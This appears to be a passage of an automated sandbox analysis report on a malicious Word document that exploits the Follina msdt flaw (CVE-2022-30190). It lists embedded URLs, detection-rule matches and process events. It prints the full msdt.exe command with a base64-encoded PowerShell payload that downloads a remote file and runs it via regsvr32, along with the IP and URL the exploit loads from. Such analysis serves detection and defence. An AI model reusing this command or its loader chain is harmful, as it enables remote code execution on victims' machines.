Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.dr | String found in binary or memory: https://officeapps.live.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://onedrive.live.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://osi.office.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://otelrules.azureedge.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office365.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office365.com/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectory
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://roaming.edog.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://settings.outlook.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://staging.cortana.ai
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://tasks.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://wus2.contentsync.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: 9E3C1D92-05B7-4098-84A1-16DB3C984217.0.drString found in binary or memory: https://www.odwebp.svc.ms
        Source: global traffic | HTTP traffic detected:
            GET /123.RES HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
            Accept-Encoding: gzip, deflate
            Host: 45.32.185.177
            Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected:
            GET /123.RES HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
            Accept-Encoding: gzip, deflate
            Host: 45.32.185.177
            If-Modified-Since: Tue, 07 Jun 2022 13:20:09 GMT
            If-None-Match: "1701-5e0db72a43821"
            Connection: Keep-Alive
        Source: DiagPackage.dll.mui.9.dr | Static PE information: No import functions for PE file found
        Source: DiagPackage.dll.9.dr | Static PE information: No import functions for PE file found
        Source: 00000009.00000002.729808859.0000000002830000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.729847278.0000000002838000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.729643897.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: 00000009.00000002.730773001.0000000002AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: Process Memory Space: msdt.exe PID: 6552, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-02
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\1FD46902.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7F7F7060.htm, type: DROPPED | Matched rule: MAL_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
        Source: DiagPackage.dll.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: DiagPackage.dll.9.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Section loaded: sfc.dll
        Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
        Source: doc1712.docx | Virustotal: Detection: 23%
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
        Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwAHMAOgAvAC8AYQBsAHMALQBvAG4AbABpAG4AZQAuAG8AcgBnAC8ASgBRAFcAagA3ADgALwBZAC4AcABuAGcAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIAOwByAGUAZwBzAHYAcgAzADIAIAAkAHAAXABGAHIAbwBzAC4AcABvAHMAdABlAHIA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES374A.tmp" "c:\Users\user\AppData\Local\Temp\qe5jzpda\CSC4563D2ED18334995B732DDC516AA1E81.TMP"
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C97.tmp" "c:\Users\user\AppData\Local\Temp\xwo13jpt\CSC9D13466D68BE46EAAB5DAAD8B4EDFE4C.TMP"
        Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\Fros.poster
        Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB3CD.tmp" "c:\Users\user\AppData\Local\Temp\ddzr0cba\CSC44E4BCADDF3245FBA3B96135AF703040.TMP"
        Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
        Source: doc1712.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\doc1712.docx
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{2CAA8033-7991-4565-AB80-E2DDAE691AB0} - OProcSessId.dat
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
        Source: classification engine | Classification label: mal72.expl.evad.winDOCX@17/32@0/1
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next
        Source: C:\Windows\SysWOW64\regsvr32.exe | Automated click: OK
        Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll

        Persistence and Installation Behavior

        Source: document.xml.rels | Extracted files from sample: mhtml:http://45.32.185.177:80/123.res!http://45.32.185.177:80/123.res
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\ddzr0cba\ddzr0cba.dll
        Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\DiagPackage.dll
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\xwo13jpt\xwo13jpt.dll
        Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_466c2050-93b8-4fd4-9932-b9db6d401695\en-US\DiagPackage.dll.mui
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\qe5jzpda\qe5jzpda.dll
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
